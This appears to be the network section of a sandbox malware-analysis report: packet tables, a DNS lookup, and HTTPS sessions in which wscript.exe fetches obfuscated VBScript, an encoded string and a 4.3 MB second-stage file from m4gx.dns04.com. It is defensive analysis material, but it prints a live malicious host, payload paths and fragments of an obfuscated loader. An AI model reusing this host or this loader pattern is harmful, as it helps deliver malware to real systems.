                                                                                                    Oct 24, 2023 06:55:29.797435999 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:29.964745045 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:29.964854956 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.046130896 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.046345949 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.434865952 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.434891939 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.434953928 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.435022116 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.435040951 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.435214043 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.549601078 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.549705029 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.770711899 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.770735025 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.770800114 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:30.938268900 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:30.938493013 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.105611086 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:31.105679989 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:31.105720997 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.105740070 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:31.105753899 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.105766058 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:31.105779886 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.105811119 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.297889948 CEST49741443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:31.297919035 CEST44349741206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.274823904 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.274918079 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.275043964 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.275397062 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.275429964 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.627537012 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.627655983 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.630409956 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.630439043 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.630630970 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.630642891 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.960217953 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.960284948 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.960395098 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.960396051 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:35.960473061 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:35.960530996 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.127269983 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.127373934 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.127873898 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.127960920 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.128226995 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.128307104 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.294701099 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.294828892 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.295037031 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.295128107 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.295666933 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.295741081 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.295989990 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.296065092 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.296631098 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.296706915 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.297336102 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.297410011 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.297590017 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.297660112 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.462723017 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.462855101 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.463165998 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.463243961 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.464227915 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.464411020 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.464716911 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.464802980 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.465017080 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.465084076 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.465894938 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.465965986 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.466402054 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.466465950 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.466805935 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.466882944 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.467588902 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.467662096 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.467854977 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.467921972 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.468390942 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.468453884 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.469067097 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.469136953 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.630108118 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.630203962 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.630486012 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.630561113 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.630809069 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.630877972 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.631098986 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.631165028 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.631711006 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.631778955 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.632137060 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.632195950 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.632220984 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.632467031 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.632533073 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.633157015 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.633233070 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.633383036 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.633447886 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.633671045 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.633749962 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.634421110 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.634526014 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.634706020 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.634773016 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.635135889 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.635195017 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.635703087 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.635761976 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.636044979 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.636111021 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.636533976 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.636599064 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.637101889 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.637168884 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.637486935 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.637548923 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.637667894 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.637731075 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.638206959 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.638281107 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.638668060 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.638726950 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.639111042 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.639178991 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.639406919 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.639477968 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.639863014 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.639924049 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.640119076 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.640173912 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.674145937 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.674406052 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.798399925 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.798640966 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.799048901 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.799137115 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.799685955 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.799819946 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.799945116 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.800040007 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.800673962 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.800770044 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.801038980 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.801134109 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.801675081 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.801762104 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.802218914 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.802306890 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.802573919 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.802660942 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.803107023 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.803195953 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.803472042 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.803561926 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.803853989 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.803920031 CEST44349743206.71.149.162192.168.2.4
                                                                                                    Oct 24, 2023 06:55:36.803941965 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.804006100 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.806144953 CEST49743443192.168.2.4206.71.149.162
                                                                                                    Oct 24, 2023 06:55:36.806196928 CEST44349743206.71.149.162192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2023 06:55:17.539669991 CEST5197553192.168.2.41.1.1.1
                                                                                                    Oct 24, 2023 06:55:17.642384052 CEST53519751.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2023 06:55:17.539669991 CEST192.168.2.41.1.1.10x12c7Standard query (0)m4gx.dns04.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2023 06:55:17.642384052 CEST1.1.1.1192.168.2.40x12c7No error (0)m4gx.dns04.com206.71.149.162A (IP address)IN (0x0001)false
                                                                                                    • m4gx.dns04.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    0192.168.2.449737206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:18 UTC0OUTGET //g1 HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:18 UTC0INHTTP/1.1 301 Moved Permanently
                                                                                                    Date: Tue, 24 Oct 2023 04:55:18 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Location: https://m4gx.dns04.com/g1/
                                                                                                    Content-Length: 315
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                    2023-10-24 04:55:18 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 34 67 78 2e 64 6e 73 30 34 2e 63 6f 6d 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29
                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://m4gx.dns04.com/g1/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu)


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    1192.168.2.449738206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:18 UTC0OUTGET /g1/ HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:19 UTC1INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 24 Oct 2023 04:55:18 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Vary: Accept-Encoding
                                                                                                    Connection: close
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Content-Type: text/plain;;charset=UTF-8
                                                                                                    2023-10-24 04:55:19 UTC1INData Raw: 36 36 38 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 54 6a 67 6a 50 6b 55 79 5a 45 31 69 49 4e 6f 79 5f 31 37 28 4c 55 46 4c 54 44 64 69 51 62 57 32 73 5f 32 36 2c 20 7a 5a 4c 6e 41 35 77 32 71 79 33 50 53 5f 31 29 0d 0a 44 69 6d 20 76 41 72 66 79 33 67 51 30 66 63 71 34 62 37 54 31 52 73 58 6a 50 5f 32 37 2c 20 53 55 77 47 74 79 5a 79 53 6e 79 4b 4f 6b 52 52 58 41 76 32 33 4e 5f 32 38 0d 0a 76 41 72 66 79
                                                                                                    Data Ascii: 668b<?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function deTjgjPkUyZE1iINoy_17(LUFLTDdiQbW2s_26, zZLnA5w2qy3PS_1)Dim vArfy3gQ0fcq4b7T1RsXjP_27, SUwGtyZySnyKOkRRXAv23N_28vArfy
                                                                                                    2023-10-24 04:55:19 UTC9INData Raw: 29 0d 0a 56 4d 69 61 65 42 6b 5a 59 35 4e 62 76 30 66 42 5f 36 31 20 3d 20 64 65 54 6a 67 6a 50 6b 55 79 5a 45 31 69 49 4e 6f 79 5f 31 37 28 22 53 45 56 45 59 45 59 46 4e 22 20 2c 20 7a 5a 4c 6e 41 35 77 32 71 79 33 50 53 5f 31 29 0d 0a 64 41 52 73 4d 43 4c 6c 74 79 37 61 5f 36 32 20 3d 20 64 65 54 6a 67 6a 50 6b 55 79 5a 45 31 69 49 4e 6f 79 5f 31 37 28 22 57 46 41 46 44 46 44 46 54 22 20 2c 20 7a 5a 4c 6e 41 35 77 32 71 79 33 50 53 5f 31 29 0d 0a 55 47 6a 54 4b 67 53 6e 57 77 71 75 5f 36 33 20 3d 20 64 65 54 6a 67 6a 50 6b 55 79 5a 45 31 69 49 4e 6f 79 5f 31 37 28 22 4b 48 52 48 53 48 48 48 51 22 20 2c 20 7a 5a 4c 6e 41 35 77 32 71 79 33 50 53 5f 31 29 0d 0a 4c 48 47 4c 57 72 41 72 6b 73 72 48 68 44 5f 36 34 20 3d 20 64 65 54 6a 67 6a 50 6b 55 79 5a 45
                                                                                                    Data Ascii: )VMiaeBkZY5Nbv0fB_61 = deTjgjPkUyZE1iINoy_17("SEVEYEYFN" , zZLnA5w2qy3PS_1)dARsMCLlty7a_62 = deTjgjPkUyZE1iINoy_17("WFAFDFDFT" , zZLnA5w2qy3PS_1)UGjTKgSnWwqu_63 = deTjgjPkUyZE1iINoy_17("KHRHSHHHQ" , zZLnA5w2qy3PS_1)LHGLWrArksrHhD_64 = deTjgjPkUyZE
                                                                                                    2023-10-24 04:55:19 UTC25INData Raw: 5f 37 31 2c 20 50 41 66 35 73 45 78 33 7a 5f 36 39 20 2b 20 77 43 56 49 35 58 75 32 43 50 45 71 61 55 56 58 76 73 38 69 5f 37 33 20 2b 20 22 34 22 20 2b 20 58 64 48 68 52 33 71 6a 4f 46 43 31 48 6a 31 36 59 78 78 5f 36 0d 0a 44 65 54 6a 67 6a 50 6b 55 79 5a 45 31 69 49 4e 6f 79 5f 31 37 46 20 50 41 66 35 73 45 78 33 7a 5f 36 39 20 2b 20 77 43 56 49 35 58 75 32 43 50 45 71 61 55 56 58 76 73 38 69 5f 37 33 20 2b 20 22 34 22 20 2b 20 58 64 48 68 52 33 71 6a 4f 46 43 31 48 6a 31 36 59 78 78 5f 36 2c 20 20 50 41 66 35 73 45 78 33 7a 5f 36 39 20 2b 20 77 43 56 49 35 58 75 32 43 50 45 71 61 55 56 58 76 73 38 69 5f 37 33 20 2b 20 22 34 22 20 2b 20 77 4a 46 6a 59 33 33 74 5f 37 0d 0a 78 44 53 58 4a 68 59 75 61 34 53 54 65 51 5a 4b 71 5f 33 31 20 50 41 66 35 73 45
                                                                                                    Data Ascii: _71, PAf5sEx3z_69 + wCVI5Xu2CPEqaUVXvs8i_73 + "4" + XdHhR3qjOFC1Hj16Yxx_6DeTjgjPkUyZE1iINoy_17F PAf5sEx3z_69 + wCVI5Xu2CPEqaUVXvs8i_73 + "4" + XdHhR3qjOFC1Hj16Yxx_6, PAf5sEx3z_69 + wCVI5Xu2CPEqaUVXvs8i_73 + "4" + wJFjY33t_7xDSXJhYua4STeQZKq_31 PAf5sE
                                                                                                    2023-10-24 04:55:19 UTC26INData Raw: 0d 0a
                                                                                                    Data Ascii:
                                                                                                    2023-10-24 04:55:19 UTC26INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    2192.168.2.449739206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:20 UTC26OUTGET /lp1a.php HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: en-ch
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:20 UTC27INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 24 Oct 2023 04:55:20 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Vary: Accept-Encoding
                                                                                                    Content-Length: 75
                                                                                                    Connection: close
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    2023-10-24 04:55:20 UTC27INData Raw: 48 45 56 45 57 43 55 45 55 46 4b 46 41 46 47 43 56 43 57 43 55 43 46 46 4f 46 49 46 44 43 57 43 58 43 58 46 47 46 41 43 53 43 46 45 56 45 57 43 55 45 55 46 4b 46 41 46 47 43 56 43 57 43 55 43 46 43 56 44 42 43 55 43 46 41 55
                                                                                                    Data Ascii: HEVEWCUEUFKFAFGCVCWCUCFFOFIFDCWCXCXFGFACSCFEVEWCUEUFKFAFGCVCWCUCFCVDBCUCFAU


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                    3192.168.2.449740206.71.149.162443C:\Windows\SysWOW64\wscript.exe
                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                    2023-10-24 04:55:20 UTC27OUTGET /lp1am1.dfhyhgf HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: en-ch
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                    Host: m4gx.dns04.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2023-10-24 04:55:21 UTC27INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 24 Oct 2023 04:55:21 GMT
                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                    Last-Modified: Tue, 29 Aug 2023 16:24:27 GMT
                                                                                                    ETag: "428bcd-604123eb0913f"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 4361165
                                                                                                    Connection: close
